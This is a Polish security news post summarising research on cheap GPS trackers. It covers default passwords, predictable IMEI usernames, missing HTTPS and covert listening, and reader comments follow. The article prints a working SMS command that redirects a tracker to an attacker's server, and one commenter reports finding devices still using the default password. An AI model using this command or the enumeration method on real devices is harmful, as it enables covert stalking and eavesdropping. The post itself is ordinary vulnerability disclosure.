Używasz GPS trackera? Być może można Cię śledzić (w tym podsłuchiwać) korzystając z domyślnego hasła 123456…

06 września 2019, 11:00 | Aktualności | komentarzy 11
: zin o bezpieczeństwie - pobierz w pdf/epub/mobi.

Niewielkie GPS trackery są często wykorzystywane do śledzenia lokalizacji dzieci, zwierząt czy przedmiotów. Takie urządzenia z jednej strony mają odbiornik sygnału GPS, z drugiej strony modem GSM (+ karta SIM), który umożliwia śledzenie lokalizacji w czasie rzeczywistym. Architektura takiego rozwiązania wygląda mniej więcej tak:

Tracker

Jak widać producenci trackerów często udostępniają appki i/lub panel webowy np.: http://en.i365gps.com. Jak widać urządzenia są też chyba popularne w Polsce:

Przechodząc do sedna – badacze Avasta przeanalizowali grupę GPS trackerów i przedstawili swoje wnioski. Po pierwsze na ww. stronie można było z marszu zalogować się do 25% urządzeń (domyślne hasło 123456, i przewidywalny username, będący liczbą):

(…)  the numbers of all other trackers are predictable and you can easily enumerate them. In combination with a fixed password, that means we could log into about 25%  of devices in this sequence of IMEI numbers.

W sumie badacze wykryli około 600 000 urządzeń z domyślnym hasłem 123456. Dalej jest tylko lepiej. Brak HTTPS przy komunikacji trackera z serwerem (lub wyżej opisane przechwycenie konta; w obu przypadkach mamy dostęp do konta ofiary) umożliwia nasłuch głosu z trackera:

You can make the tracker call an arbitrary phone number and once connected, you can listen through the tracker the other party without their knowledge.

Jak można z kolei przejąć tego typu urządzenie zwykłym SMS-em? Wystarczy wysłać coś takiego na numer karty SIM trackera:

SMS

pw,123456,ip,nasz_adres_ip,y# Co robi tracker? Zmieni konfigurację tak żeby łączyć się do naszego serwera (a nie serwera producenta). Voila.

Na koniec – tego typu trackery popularne są niemal na całym świecie, a często różni producenci używają tej samej infrastruktury serwerowej…

–ms

Spodobał Ci się wpis? Podziel się nim ze znajomymi:Komentarze

 1. A

  Poleci ktoś sprzęt z którego można zrobić sensowny tracker? Z własnym softem np w pythonie. Kiedyś były takie trackery na bazie modułów telita ale to starocie, powolne, mało pamięci, nie obsługują 3g itd.

  Odpowiedz
  • Ł

   Zależy do czego. Jeśli nie musi być miniaturowy to najlepiej arduino

   Odpowiedz
   • A

    To wyszła by ogromna krowa gabarytowo. Moduły ładowania li-ion, pomiaru napięcia zasilania, prądu ładowania, poboru prądu przez antenę gps, modem komunikacji 3g, akcelerometr itd.

    Chodzi o hw gotowe, przemyślane, a tylko z możliwością wrzucenia własnego oprogramowania.

    Odpowiedz
 2. Paweł

  Mam taki chiński tracker (st-901) i problem wynika też z mnogości podrób (tak, Chińczycy podrabiają chińskie produkty). I tak np. ST-901 można kupić a dostać GT09 albo cokolwiek innego. Polecam temat na elektrodzie: „GT02-Sinotrack ST901 – Mini tracker GPS nie zmienia strefy czasowej”. Ogólnie nie polecam takich rozwiązań komukolwiek kto chce „zabezpieczyć” cokolwiek, bo możliwe że tego typu rozwiązanie jeszcze ułatwi złodziejom namierzenie potencjalnego łupu.

  Odpowiedz
  • zero one

   Dobrze Panie @Pawle że Pan o tym wspomina.
   Pozdrawiam.

   Odpowiedz
 3. ja

  Taki GPS GF-07 nie działa u nas w wcale.
  Po zakupie i googlaniu okazało się że pozycje określa na podstawie sieci GSM w sposób nie obsługiwany w europie.
  Może służyć jedynie jako podsłuch. Odbiera połączenie od każdego numeru bez żadnej autoryzacji.

  Odpowiedz
 4. Witek

  O tyle bezpieczniej, że dopóki nie zostanie wpisany numer telefonu w panelu www ani aplikacji nie jest widoczny.

  Odpowiedz
 5. Xergon

  Nie chce nic mówic ale po chwili znalazlem 2 numery z domyślnym hasłem ;/ żenada.

  Odpowiedz
 6. zero one

  Boże na nieboskłonie!
  „123456”? Serio? Przecież to tragikomedia jakaś. ;-D

  Odpowiedz
 7. traccar

  Serwer można sobie postawić samemu (traccar – za darmo, działa w Dockerze, itd…), hasło trzeba oczywiście zmienić w module SMSem i ustawić niestandardowy port. Jest opis jak zrobic HTTPS, ale mi się nie chciało ;-) Jak kogoś interesuje gdzie jest mój rower… cóż. Podsłuch? Moduł jest pod siodełkiem :-D

  Odpowiedz
 8. Michał

  Wielka rewelacja.
  Te informacje są powszechnie dostępne w Internecie od ponad 2 lat
  (moje dziecko dostało taki zegarek na prezent). Polecam FAQ na stronie dystrybutora Garett.

  Odpowiedz

Odpowiedz